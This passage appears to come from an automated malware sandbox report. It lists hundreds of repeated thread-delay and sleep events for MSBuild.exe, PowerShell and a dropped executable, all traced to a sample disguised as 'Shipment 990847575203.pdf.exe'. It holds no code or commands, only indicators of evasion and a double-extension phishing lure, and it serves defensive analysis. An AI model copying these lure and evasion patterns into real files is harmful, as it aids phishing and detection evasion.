                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599764
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599516
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599401
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598983
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597325
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596387
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3237Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6320Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7795Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7956
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1887
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe TID: 6116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 3237 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 43 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7504Thread sleep count: 2049 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7504Thread sleep count: 7795 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599016s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597016s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596250s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596141s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596016s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep count: 35 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7792Thread sleep count: 7956 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7792Thread sleep count: 1887 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599764s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599516s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599401s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -599219s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598983s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598735s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598610s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598485s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598370s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598141s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -598016s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597438s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597325s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -597094s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596844s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596719s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596609s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596498s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596387s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596258s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596141s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -596016s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595797s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595438s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595313s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595203s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -595094s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594984s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594750s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594531s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594187s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7788Thread sleep time: -594078s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598797Jump to behavior
